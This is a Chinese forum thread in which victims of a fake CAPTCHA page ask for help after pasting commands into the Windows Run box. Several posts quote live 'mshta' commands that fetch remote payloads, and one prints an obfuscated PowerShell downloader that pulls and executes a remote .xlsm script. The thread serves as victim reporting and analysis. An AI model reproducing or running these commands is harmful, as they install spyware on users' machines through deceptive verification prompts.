病毒吧 关注:310,745贴子:1,249,054
  • 21回复贴,共1

代码病毒求助贴

只看楼主收藏回复

求大佬看看,进了一个网站,脑子抽了一样搞了那个机验证,一样win+r输入了一串代码,不过我有复制下来。求大佬看看有什么问题,按完回车才反应过来
mshta https://t2.awagama.org/re4.mp4 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165


IP属地:广东来自Android客户端1楼2024-12-30 04:47回复
    火绒没找到,现在让卡巴斯基扫一晚上,明天不知道结果如何


    IP属地:广东来自Android客户端2楼2024-12-30 05:07
    收起回复
      2025-08-26 21:32:09
      广告
      不感兴趣
      开通SVIP免广告
      呼叫吧主


      IP属地:江苏来自Android客户端3楼2024-12-30 12:16
      回复
        这个是尝试利用Microsoft HTML Application去执行一个.mp4的远程文件,这个疑似恶意代码。用卡巴斯基等杀毒软件进行全盘扫描,并且排除可疑进程看看


        IP属地:广东来自Android客户端4楼2024-12-30 12:36
        收起回复
          这个代码会下载间谍程序,目前已知卡巴斯基可以检测


          IP属地:山东来自Android客户端5楼2024-12-30 13:18
          收起回复
            麻烦提供一下网页连接,我进行分析一下哈


            IP属地:广东6楼2024-12-30 14:26
            收起回复
              网站被墙了貌似(?


              IP属地:福建来自iPhone客户端7楼2025-01-01 09:07
              回复
                救命,我也遇到了,有弹出蓝色的poweshell,咋办啊现在?


                IP属地:广东8楼2025-03-08 22:16
                回复
                  2025-08-26 21:26:09
                  广告
                  不感兴趣
                  开通SVIP免广告
                  我也遇到了相似的情况,不小心访问了https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/tozeyourslok/o/preload-verif-processing.html
                  执行了mshta https://jackios.shop/surfinglo.mp3 # # Ⅰ ɑm ոօt ɑ ɾօbօt: ϹΑΡΤCHA Verіfіcаtіοո UID: 181902。
                  这个mp3文件看上去像是正常的音频文件,实际上里面夹带私货,有<script>标签,跟踪下来最后是用powershell执行了这个
                  iexStart-Process "$env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ArgumentList '-NoProfile','-ExecutionPolicy','Unrestricted','-Command','SV ut ([Net.WebClient]::New());SI
                  Variable:3S (((([Net.WebClient]::New()|Get-Member)|?{(Get-ChildItem Variable:/_).Value.Name -clike ''*wn*g''}).Name));Set-Item Variable:\p ''https://h1.yyoiy.shop/750413b4e6897a671bc759e04597952a0be7478301
                  89873b.xlsm'';IEX (Get-Item Variable:/ut).Value.((Get-Item Variable:3S).Value)((Variable p -ValueOn))';$GdLKafMo = $env:AppData;function AKbE($MqPitd, $zYWMTrhxs){curl $MqPitd -o $zYWMTrhxs};function ZHMeh
                  (){function JUrNP($nbaVWwQd){if(!(Test-Path -Path $zYWMTrhxs)){AKbE $nbaVWwQd $zYWMTrhxs}}}ZHMeh;
                  这个xlsm文件有好几万行,而且混淆过,实在是看不懂了,希望有高手能帮忙分析一下它到底干了什么,有什么危害,非常感谢


                  IP属地:黑龙江9楼2025-03-23 04:14
                  回复
                    xlsm文件实际是powershell脚本,一层一层拆开以后,实际执行了这个病毒exe文件:
                    https://www.virustotal.com/gui/file/01e9fc39f6ae53dd70a292daff68b77d76e0f36911d887b0d7e42f7aa1c1512b
                    我不会用IDA,懂逆向的可以看下。也不知道怎么干掉这个病毒,现在好像没有可疑进程,也没有可疑网络连接,360也扫不出来。


                    IP属地:黑龙江10楼2025-03-23 18:50
                    收起回复
                      mshta https://kezming.shop/lingerhereplaying.mp3 # # Ⅰ ɑm ոօt ɑ ɾօbօt: ϹΑΡΤCHA Verіfіcаtіοո UID: 181902


                      IP属地:天津11楼2025-03-27 08:26
                      回复